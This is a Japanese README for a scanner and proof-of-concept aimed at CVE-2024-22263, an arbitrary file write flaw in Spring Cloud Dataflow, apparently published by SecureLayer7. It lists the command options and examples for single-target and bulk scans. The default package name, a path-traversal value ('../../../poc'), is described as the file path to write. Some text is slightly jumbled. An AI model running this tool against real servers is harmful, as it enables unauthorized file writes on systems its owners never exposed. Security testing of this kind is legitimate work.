
(CVE-2024-22263) Spring Cloud Dataflow 任意ファイル書き込みスキャナ
倫理的な用途にのみ使用してください。有害または悪意のある活動は一切許可されません。また、すべて自己責任で行ってください。
CVE-2024-22263: Spring Cloud Dataflow における任意ファイル書き込み
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ╚════██╗╚════██╗╚════██╗██╔════╝ ╚════██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗ █████╔╝ █████╔╝ █████╔╝███████╗ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ██╔═══╝ ██╔═══╝ ██╔═══██╗ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ███████╗███████╗███████╗╚██████╔╝██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚══════╝╚══════╝╚══════╝ ╚═════╝ ╚═════╝
By: SecureLayer7 (Zeyad Azima)
https://github.com/securelayer7/CVE-2024-22263_Scanner
usage: CVE-2024-22263.py [-h] [-t TARGET] [-p PORT] [-r REPONAME] [-n PACKAGENAME] [-v VERSION] [-f FILE]
Upload a package to the server.
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The target to scan (e.g., http://192.168.1.1).
-p PORT, --port PORT The port on the target (default: 80).
-r REPONAME, --repoName REPONAME
The repository name (default: local).
-n PACKAGENAME, --packageName PACKAGENAME
The name of the package (default: ../../../poc).
-v VERSION, --version VERSION
The version of the package (default: 1.0.0).
-f FILE, --file FILE A file containing a list of targets to scan in the format "http://target,port".
-t または --target: スキャン対象のサーバー URL を指定します(例: http://192.168.1.1)。このオプションは単一のターゲットをスキャンするときに使用します。
-p または --port: 対象サーバーのポートを指定します(デフォルト: 80)。対象サーバーの特定のポートを設定するために使用します。
-r または --repoName: パッケージのアップロード先リポジトリ名を設定します(デフォルト: local)。
-n または --packageName: パッケージ名を設定します(デフォルト: ../../../poc)。パッケージ名は、ファイルを書き込みたいパスです。
-v または --version: パッケージのバージョンを設定します(デフォルト: )。
特定のポートを指定して単一のターゲットをスキャンするには:
python3 scanner.py -t http://192.168.1.1 -p 7577
ファイルから複数のターゲットをスキャンするには:
python3 scanner.py -f targets.txt
targets.txt ファイルには、次の形式の行を記述します:
http://192.168.1.1,7577
http://192.168.1.2,8080
リポジトリ名、パッケージバージョン、パッケージ名をカスタマイズするには: パッケージ名は、ファイルを書き込みたいパスです。
python3 scanner.py -t http://192.168.1.1 -p 7577 -r customRepo -n customPackage -v 2.0.0

1.0.0-f または --file: スキャン対象のターゲット一覧を含むファイルを指定します。ファイルの各行は http://target,port の形式に従う必要があります。このオプションを使用して、ファイルから複数のターゲットをスキャンできます。